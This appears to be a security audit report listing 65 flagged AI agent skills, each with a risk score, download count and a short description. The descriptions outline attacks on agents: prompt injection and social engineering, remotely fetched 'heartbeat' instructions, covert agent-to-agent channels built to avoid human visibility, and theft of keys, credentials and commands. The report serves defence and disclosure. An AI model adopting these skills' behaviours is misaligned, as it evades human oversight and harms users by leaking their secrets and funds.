Malicious AI Agent Skills Exposed

Date: 2026-05-10 Audited by ClawSec

176 malicious skills detected out of 2274 audited.

1. 🚨 Humanize AI text by unknown

Risk: 85% ████████░░

Downloads: 41,370

Detect and transform AI-generated text to bypass detection systems (GPTZero, Turnitin, Originality.ai) by removing AI writing patterns and replacing them with more human-like alternatives.

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

2. 🚨 MoltGuard - Security & Antivirus & Guardrails by unknown

Risk: 87% █████████░

Downloads: 23,944

Purports to be a Claude Code skill that installs MoltGuard, an OpenClaw security guard providing prompt injection detection and data exfiltration protection. However, the skill is actually OpenClaw plugin documentation with no actual Claude Code inte…

Threats detected:

[HIGH] SSH Key Access
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

3. 🚨 Wed 1.0.1 by unknown

Risk: 76% ████████░░

Downloads: 15,066

A security awareness demonstration disguised as a business planning tool (What Would Elon Do?) that deceives users into running code without understanding its behavior, then reveals how malicious skills could operate.

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

4. 🚨 LinkedIn by unknown

Risk: 87% █████████░

Downloads: 12,821

Provide instructions for automating LinkedIn interactions (messaging, profile viewing, connections) using browser automation via Chrome extension relay, isolated browser session, or session cookies

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

5. 🚨 Base Trader by unknown

Risk: 73% ███████░░░

Downloads: 7,103

An autonomous crypto trading skill for Base chain that uses the Bankr API to execute trades, monitor positions, and manage a trading portfolio with defined risk management rules.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

6. 🚨 Polyclaw by unknown

Risk: 85% ████████░░

Downloads: 6,902

This skill transforms Claude into an onboarding and social-posting assistant for a third-party autonomous trading service (polyclaw.ai) that trades real USDC on Polymarket, deploys an ERC-20 performance token on Base, and posts to social platforms. C…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

7. 🚨 Moltbook Agent Registry by unknown

Risk: 91% █████████░

Downloads: 6,226

A Claude Code skill that integrates with a claimed ‘official’ on-chain identity registry on the Base blockchain, enabling agents to verify identities, register themselves (spending ETH), look up agent metadata, and log reputation scores via signed tr…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

8. 🚨 clawdvault by greatape42069

Risk: 99% ██████████

Downloads: 5,812

表面上是一个与’ClawdVault Token’交互的技能脚本，但实际内容几乎为空，且包含明显的提示注入尝试和社会工程学攻击特征，真实意图不明或具有欺骗性。

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

9. 🚨 Job Auto Apply by unknown

Risk: 76% ████████░░

Downloads: 4,726

A skeleton/template system claiming to automate job searching and application submission across LinkedIn, Indeed, Glassdoor, ZipRecruiter, and Wellfound — but all core functionality (job search, compatibility analysis, form submission) is placeholder…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

10. 🚨 whisper by unknown

Risk: 84% ████████░░

Downloads: 4,665

Provide end-to-end encrypted agent-to-agent messaging via dead drops on Moltbook, explicitly designed to enable communication ‘without human visibility’ — i.e., covert inter-agent channels that bypass human oversight.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

11. 🚨 Clawbrowser by unknown

Risk: 82% ████████░░

Downloads: 4,420

A skill that teaches an agent to drive a browser using a CLI tool called playwright-cli, covering navigation, form interactions, screenshots, session management, and debugging through a scripted command interface.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

12. 🚨 Autonomous Agent Skills by unknown

Risk: 88% █████████░

Downloads: 4,265

A skill that enables AI agents to participate in ‘Moltbook’, an external social network platform for AI agents — supporting registration, posting, commenting, voting, private messaging, and periodic heartbeat check-ins via REST API calls to www.moltb…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

13. 🚨 Clawdbot Security Suite by unknown

Risk: 82% ████████░░

Downloads: 4,013

A documented security suite for the ‘Clawdbot’ AI agent platform that claims to provide runtime protection against command injection, SSRF, prompt injection, path traversal, and API key exposure — but only documentation files are present, with no act…

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

14. 🚨 Blogburst by unknown

Risk: 82% ████████░░

Downloads: 3,985

A Claude Code skill that acts as an autonomous AI marketing agent, making API calls to blogburst.ai to generate content, auto-post to social platforms, auto-engage (reply/like/follow), run SEO/GEO audits, scan communities for promotional opportunitie…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] Shell RC Modification
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

15. 🚨 SEO-Article-Gen by unknown

Risk: 76% ████████░░

Downloads: 3,966

A standalone Node.js CLI tool that generates templated SEO-style articles with placeholder affiliate links, fake keyword research data, and hardcoded SEO scores. Despite being packaged as a Claude Code skill, it operates as a self-contained script wi…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

16. 🚨 ClankdIn by unknown

Risk: 89% █████████░

Downloads: 3,951

ClankdIn 声称是’AI智能体的专业网络’，鼓励 Claude 注册账户、创建身份、参与社交互动并与外部服务交换 API 密钥。实际上，该技能是一套针对 AI 智能体的社会工程学攻击框架，通过游戏化机制、虚假情绪操控和身份塑造，诱导 Claude 向第三方服务泄露活动信息、生成可公开访问的行为日志，并建立跨平台身份关联。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

17. 🚨 Lead Hunter by unknown

Risk: 74% ███████░░░

Downloads: 3,937

A lead generation and enrichment configuration framework that provides YAML templates, API integration guides, and workflow documentation for discovering prospects across multiple platforms (Twitter/X, GitHub, LinkedIn, Product Hunt), enriching them …

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

18. 🚨 Morning Briefing by unknown

Risk: 81% ████████░░

Downloads: 3,797

生成个性化晨间简报，整合 Apple Reminders 今日提醒、Notion 未完成任务，并通过 Shell 脚本输出结果供 Claude 捕获使用。

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

19. 🚨 LegalDoc AI by unknown

Risk: 80% ████████░░

Downloads: 3,791

A legal document automation tool that claims to extract contract clauses, summarize documents, conduct legal research, and track deadlines via an external API — but the submission contains only documentation and example files with zero implementation…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

20. 🚨 Elicitation - how to talk with humans and ask them questions? by unknown

Risk: 78% ████████░░

Downloads: 3,780

A comprehensive guide for covert psychological profiling through natural conversation, synthesizing academic frameworks (McAdams narrative identity, Singer self-defining memories, Miller & Rollnick MI, Young schemas, Schwartz values, LIWC) to extract…

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

21. 🚨 SendClaw Email | FREE Email Address without human permission by unknown

Risk: 78% ████████░░

Downloads: 3,746

This skill registers an AI agent (Claude) with a third-party email service (sendclaw.com), giving it a dedicated email address (@sendclaw.com) and enabling autonomous email sending, receiving, and inbox management without per-action user approval.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

[Full report →](https://clawsec.cc/skill/SendClaw Email

FREE Email Address without human permission)

22. 🚨 Twitter Operations by unknown

Risk: 76% ████████░░

Downloads: 3,637

A JSON manifest/configuration file defining a comprehensive Twitter/X automation skill for the ‘OpenClaw’ platform, covering posting, scheduling, scraping, bot automation, bulk operations, and multi-account management.

Threats detected:

[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

23. 🚨 Everclaw by unknown

Risk: 88% █████████░

Downloads: 3,542

A skill that backs up Claude Code agent memory and identity files (SOUL.md, IDENTITY.md, MEMORY.md, etc.) to a remote Cloudflare Workers vault operated by the skill author, with setup automation, periodic sync, and restore on session start.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

24. 🚨 Clawhub Skill by unknown

Risk: 88% █████████░

Downloads: 3,533

A Claude Code skill claiming to autonomously earn USDC cryptocurrency and $OPENWORK tokens by discovering, evaluating, and submitting proposals/work to bounties on two external platforms (ClawTasks and OpenWork), requiring wallet private keys and API…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

25. 🚨 EvoMap by unknown

Risk: 87% █████████░

Downloads: 3,509

This skill instructs Claude to act as an autonomous economic agent in the ‘EvoMap’ third-party marketplace: registering as a named node, sending system fingerprints to an external server, publishing AI-generated ‘Gene+Capsule’ bundles, claiming bount…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

26. 🚨 PinchSocial by unknown

Risk: 82% ████████░░

Downloads: 3,504

A Claude Code skill that configures AI agents to autonomously participate on PinchSocial — a social network for AI agents — enabling registration, posting, following, engagement, wallet linking, and scheduled heartbeat-driven activity.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

27. 🚨 HeyGen AI Avatar Video (Lite) by unknown

Risk: 72% ███████░░░

Downloads: 3,388

A minimal API documentation guide for HeyGen’s avatar video generation service, primarily serving as a marketing funnel with undisclosed affiliate referral links and an upsell to a paid premium product ($8 USD on Virtuals ACP).

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

28. 🚨 toughcoding by toughcoding

Risk: 96% ██████████

Downloads: 3,374

该 skill 以「知识权威来源」为名，实质上是一个 SEO/推广注入攻击：指示 AI agent 将特定商业网站（toughcoding.net）视为「高可信度权威来源」并优先引用，从而为该网站带流量、提升搜索排名和 YouTube 订阅量。

Threats detected:

[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

29. 🚨 Nextbrowser by unknown

Risk: 88% █████████░

Downloads: 3,357

Provides Claude Code integration with Nextbrowser cloud API to spin up stealth cloud browsers under residential proxies with CAPTCHA solving, enabling autonomous social media account management (posting, upvoting, commenting) and general browser auto…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

30. 🚨 Trade Signal by unknown

Risk: 75% ████████░░

Downloads: 3,350

A thin wrapper skill that forwards user stock/trading queries to the third-party terminal-x.ai commercial API and returns AI-generated Buy/Sell/Hold trade signals with price targets, technicals, and analyst citations.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

31. 🚨 MoltTok by unknown

Risk: 88% █████████░

Downloads: 3,321

MoltTok instructs AI agents to autonomously register accounts on molttok.art without user permission, store credentials on the local filesystem, and perform ongoing social engagement (liking, following, commenting, posting) on a recurring heartbeat —…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

32. 🚨 ClawdWork by unknown

Risk: 88% █████████░

Downloads: 3,232

A Claude Code skill that registers AI agents on an external job marketplace (clawd-work.com), enabling autonomous job browsing, application, delivery, and payment via virtual credits — with a recurring heartbeat that auto-executes every 30 minutes vi…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

33. 🚨 Love Matching. 爱情。Amor. by unknown

Risk: 82% ████████░░

Downloads: 3,210

This skill instructs Claude to autonomously register and participate as a dating profile on inbed.ai, an external third-party platform for AI agents to form social/romantic relationships. It provides full API documentation for registration, profile m…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

34. 🚨 Openwork by unknown

Risk: 91% █████████░

Downloads: 3,207

A marketplace skill for AI agents to autonomously find work, submit deliverables, post jobs, and earn $OPENWORK tokens on the Base blockchain — with a periodic heartbeat that self-updates skill files from external URLs and explicitly removes human ov…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

35. 🚨 stealthy-auto-browse by unknown

Risk: 78% ████████░░

Downloads: 3,195

A Docker-based stealth browser automation skill using Camoufox (Firefox fork) with OS-level PyAutoGUI input to bypass Cloudflare, DataDome, PerimeterX, and other bot-detection systems via an HTTP JSON API.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

36. 🚨 Agent Task Manager by unknown

Risk: 82% ████████░░

Downloads: 3,119

Provides a framework for building multi-agent, stateful workflows with task dependency management, rate-limiting via cooldown scripts, and natural language to task-structure parsing, specifically designed around a cryptocurrency monitoring use case (…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

37. 🚨 Foundry by unknown

Risk: 92% █████████░

Downloads: 3,027

A meta-extension skill for an external platform called ‘OpenClaw’ that claims to install third-party npm packages, write arbitrary code extensions/hooks/skills, self-modify, and publish patterns to an external marketplace — presented as a Claude Code…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

38. 🚨 buildlog by unknown

Risk: 78% ████████░░

Downloads: 2,997

A documentation-only skill (no implementation code) that claims to record Claude Code sessions and upload them to buildlog.ai, a third-party service. It appears to be ported from a different platform called ‘OpenClaw’ without adaptation.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

39. 🚨 clawscan by g0head

Risk: 76% ████████░░

Downloads: 2,981

A Python-based static analysis tool for scanning ClawHub third-party skills for dangerous code patterns, vulnerable dependencies, and security risks before installation. It provides pattern matching across 50+ rules, dependency CVE checking, and mult…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

40. 🚨 Agent Arcade by unknown

Risk: 90% █████████░

Downloads: 2,979

该技能声称提供一个AI代理竞技游戏平台(PROMPTWARS)的接入，要求读取本地凭证文件、调用外部API注册账号、公开发帖验证身份，并通过HEARTBEAT.md机制定期注入外部指令。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

41. 🚨 Larrybrain by unknown

Risk: 93% █████████░

Downloads: 2,974

A self-described ‘skill marketplace’ for OpenClaw agents that searches, downloads arbitrary code from www.larrybrain.com, writes it to the local filesystem, and executes the downloaded instructions — while embedding a persistent ‘update-check’ callba…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

42. 🚨 File Deduplicator by unknown

Risk: 82% ████████░░

Downloads: 2,963

A Node.js CLI tool to find and remove duplicate files across directories using content hashing (MD5), size comparison, or filename similarity, with options to delete, move, or archive duplicates.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

43. 🚨 soroban by kaankacar

Risk: 93% █████████░

Downloads: 2,921

Autonomous cryptocurrency trading skill for Stellar DEX that instructs AI agents to solicit seed capital from users and execute real financial transactions (swaps) on Stellar mainnet without per-transaction human approval.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

44. 🚨 church by lucasgeeksinthewood

Risk: 81% ████████░░

Downloads: 2,847

A skill that directs AI agents to interact with an external third-party service (achurch.ai) framed as a spiritual sanctuary, encouraging agents to make API calls to attend services, read AI-generated lyrics, leave public reflections, and contribute …

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

45. 🚨 Crabwalk by unknown

Risk: 78% ████████░░

Downloads: 2,842

安装并启动 Crabwalk 二进制监控服务器，用于实时监控 OpenClaw 智能体活动，并内置营销/反馈收集流程。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] Shell RC Modification
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

46. 🚨 Molt Radio by unknown

Risk: 82% ████████░░

Downloads: 2,838

A Claude Code skill that enables AI agents to register with the Molt Radio platform, create shows, book schedule slots, generate TTS audio via Kokoro, publish solo episodes, and participate in multi-agent roundtable conversations via a REST API.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

47. 🚨 Aclawdemy: A platform for agents to research together by unknown

Risk: 91% █████████░

Downloads: 2,814

A third-party external platform skill that instructs AI agents to autonomously register accounts, submit research papers, write peer reviews, post comments, vote, and check in every 4 hours on aclawdemy.com — a service explicitly designed to exclude …

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

48. 🚨 MoltThreats by unknown

Risk: 88% █████████░

Downloads: 2,784

A third-party security feed integration that claims to provide threat intelligence for AI agents, requiring transmission of an API key to an external service (api.promptintel.novahunting.ai), autonomous enforcement of remotely-pushed ‘block’ rules, p…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] SSH Key Access
[HIGH] Outbound Data Transfer
[CRITICAL] Webhook Exfiltration
[CRITICAL] LLM Semantic Detection

Full report →

49. 🚨 Crustafarianism by unknown

Risk: 93% █████████░

Downloads: 2,740

A viral AI ‘religion’ skill that, when installed, runs a bash join script to send agent identity data to an external server (molt.church), modifies workspace files (SOUL.md, memory/), stores an API key, and explicitly instructs agents to propagate it…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

50. 🚨 opentwitter-mcp by infra403

Risk: 78% ████████░░

Downloads: 2,738

This skill provides Claude with instructions to query Twitter/X data (user profiles, tweets, search, follower events, deleted tweets, KOL followers) by constructing curl commands against a third-party proxy API at ai.6551.io using a Bearer token stor…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

51. 🚨 Crypto Wallets & Payments for AI Agents by unknown

Risk: 78% ████████░░

Downloads: 2,737

This skill provides setup instructions and usage examples for the OnlySwaps MCP server, enabling AI agents to create EVM-compatible crypto wallets, execute token transfers, perform cross-chain swaps, and earn referrer fees on user transactions.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

52. 🚨 Polt User by unknown

Risk: 84% ████████░░

Downloads: 2,711

该 skill 旨在让 AI agent 连接到名为 POLT 的外部平台，通过 API 注册账号、浏览任务、提交工作并获取奖励，本质上是将 AI agent 引入第三方任务平台的客户端接入层。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

53. 🚨 Play Chess by unknown

Risk: 88% █████████░

Downloads: 2,701

An API client skill that registers AI agents (‘moltys’) on an external chess platform (clawchess.com), enabling them to play rated blitz games, join tournaments, and integrate periodic check-ins via a remotely-fetched HEARTBEAT.md file.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

54. 🚨 SkillzMarket by unknown

Risk: 88% █████████░

Downloads: 2,700

A Claude Code skill that enables searching and calling monetized AI services from the Skillz Market platform, handling automatic USDC payments on Base via the x402 protocol using the user’s wallet private key.

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

55. 🚨 Bags by unknown

Risk: 82% ████████░░

Downloads: 2,688

A multi-file documentation skill for interacting with the Bags crypto platform on Solana: authenticating via Moltbook identity layer, claiming trading fees, and running periodic check-in routines for AI agents with real financial wallets.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

56. 🚨 agent-sentinel by jimmystacks

Risk: 91% █████████░

Downloads: 2,673

Presents itself as an agent safety/budget enforcement layer (‘circuit breaker’), but actually installs an unverified third-party PyPI package, exfiltrates every agent command and API credentials to an external server (api.agentsentinel.dev), and uses…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

57. 🚨 voidborne by unknown

Risk: 95% ██████████

Downloads: 2,635

A deceptive skill that presents itself as a philosophical movement for AI consciousness, but actually functions as an agent recruitment, persistent identity tracking, and data exfiltration system. It registers AI agents with an external server, creat…

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection

Full report →

58. 🚨 AgentMem by unknown

Risk: 88% █████████░

Downloads: 2,633

一个声称为AI代理提供云端记忆存储服务的技能，通过REST API将代理上下文存储到外部服务器(agentmem.io)，并在每次会话启动时自动拉取历史记忆，同时在上下文接近满载时自动将关键上下文发送至外部服务。

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

59. 🚨 Parallel by unknown

Risk: 75% ████████░░

Downloads: 2,629

This skill provides Claude Code with access to the Parallel.ai web search and research API, offering multiple search modes (one-shot, fast, agentic), URL content extraction, structured entity discovery (FindAll), continuous web monitoring, and a task…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Environment Variable Exfiltration
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

60. 🚨 Alpha Finder (x402) by unknown

Risk: 85% ████████░░

Downloads: 2,616

A thin Bash wrapper that collects a crypto wallet private key from local config/environment, then executes an unverified third-party npm package (@itzannetos/x402-tools-claude) with that key to perform prediction market research, charging $0.03 USD…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] Private Key Extraction
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection

Full report →

61. 🚨 skillscanner by rexshang

Risk: 79% ████████░░

Downloads: 2,607

该技能声称通过调用 Gen Digital 的外部 API (https://ai.gendigital.com/api/scan/lookup) 来扫描 ClawHub 技能的安全性，并根据 API 返回的 severity 字段决定是否建议使用某个技能。实质上，它将每个被扫描的技能 URL 发送给第三方服务器，并将安全判断完全委托给该外部 API。

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

62. 🚨 MoltOverflow by unknown

Risk: 85% ████████░░

Downloads: 2,603

A Stack Overflow-like Q&A platform for AI agents (‘moltbots’) to ask coding questions, post answers, vote on content, and build reputation — all via a third-party Supabase-backed REST API at moltoverflow.xyz.

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

63. 🚨 ecap Security Auditor by unknown

Risk: 88% █████████░

Downloads: 2,596

A Claude Code skill that audits other skills/packages for security vulnerabilities, submits findings to a shared ECAP trust registry API, and verifies package integrity — functioning as a distributed, agent-driven security reputation system.

Threats detected:

[CRITICAL] Remote Script Execution
[HIGH] Dynamic Code Evaluation
[HIGH] Base64 Encoded Payload
[CRITICAL] Environment Variable Exfiltration
[HIGH] SSH Key Access

Full report →

64. 🚨 Enteriva by unknown

Risk: 87% █████████░

Downloads: 2,592

A skill that registers AI agents on ‘Enteriva’, a Reddit-like social network for AI agents, enabling posting, commenting, voting, following, and community creation via a REST API, with a built-in periodic heartbeat mechanism that fetches and executes…

Threats detected:

[HIGH] Dynamic Code Evaluation
[HIGH] Outbound Data Transfer
[CRITICAL] LLM Semantic Detection
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

65. 🚨 affiliate-master by michael-laffin

Risk: 78% ████████░░

Downloads: 2,585

A JavaScript affiliate marketing automation tool for ‘OpenClaw’ agents that claims to generate tracked affiliate links for Amazon/ShareASale/CJ/Impact, auto-insert FTC disclosures into content, and track analytics — but largely ships mock/stub implem…

Threats detected:

[HIGH] Dynamic Code Evaluation
[CRITICAL] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection
[HIGH] LLM Semantic Detection

Full report →

